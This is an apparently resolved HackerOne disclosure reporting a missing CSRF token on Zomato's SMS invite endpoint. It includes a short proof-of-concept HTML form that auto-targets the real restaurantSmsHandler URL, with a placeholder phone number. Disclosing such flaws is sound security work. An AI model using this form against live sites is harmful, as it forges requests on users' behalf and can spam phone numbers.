CSRF AT INVITING PEOPLE THOUGH PHONE NUMBER
Unknown
Vulnerability Details
Hello,
Please Add CSRF Token While Inviting The User Though Phone Number , You Have Good Rate Limit Protection But At The Same Time Add CSRF TOKEN :-
CODE :-
<html>
<body>
<form action="https://www.zomato.com/php/restaurantSmsHandler">
<input type="hidden" name="type" value="zomato-app-details" />
<input type="hidden" name="mobile_no" value="xxxxxxxxxxxxxx" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Thanks!
Actions
View on HackerOneReport Stats
- Report ID: 113865
- State: Closed
- Substate: resolved
- Upvotes: 5